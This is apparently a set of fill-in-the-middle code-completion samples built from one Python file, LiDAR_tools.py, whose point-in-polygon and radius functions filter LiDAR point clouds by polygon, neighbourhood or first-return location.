if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
<|fim_middle|>
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | inside = not inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
<|fim_middle|>
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
<|fim_middle|>
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]) |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
<|fim_middle|>
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)]) |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
<|fim_middle|>
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:] |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
<|fim_middle|>
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This is my own version of the ray-casting algorithm. It uses numpy arrays so that a list of x and y coordinates can be processed in one call, and only the points inside the polygon are returned, together with a boolean mask over the inputs in case it is needed for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. The target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points.
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
<|fim_middle|>
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon) |
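A minimal sketch of the vectorised points_in_poly variant above, assuming the file is importable as LiDAR_tools; the square and the sample coordinates are illustrative:

import numpy as np
from LiDAR_tools import points_in_poly  # module name taken from the file header above

square = [(0.0, 0.0), (2.0, 0.0), (2.0, 2.0), (0.0, 2.0)]
x = np.array([0.5, 1.0, 3.0, -1.0])
y = np.array([0.5, 1.5, 1.0, 0.5])
x_in, y_in, mask = points_in_poly(x, y, square)
# mask is a boolean array aligned with the inputs; x_in and y_in hold only the inside points
print(mask)        # expected: [ True  True False False]
print(x_in, y_in)  # expected: [0.5 1. ] [0.5 1.5]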
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This is my own version of the ray-casting algorithm. It uses numpy arrays so that a list of x and y coordinates can be processed in one call, and only the points inside the polygon are returned, together with a boolean mask over the inputs in case it is needed for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. The target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points.
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
<|fim_middle|>
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
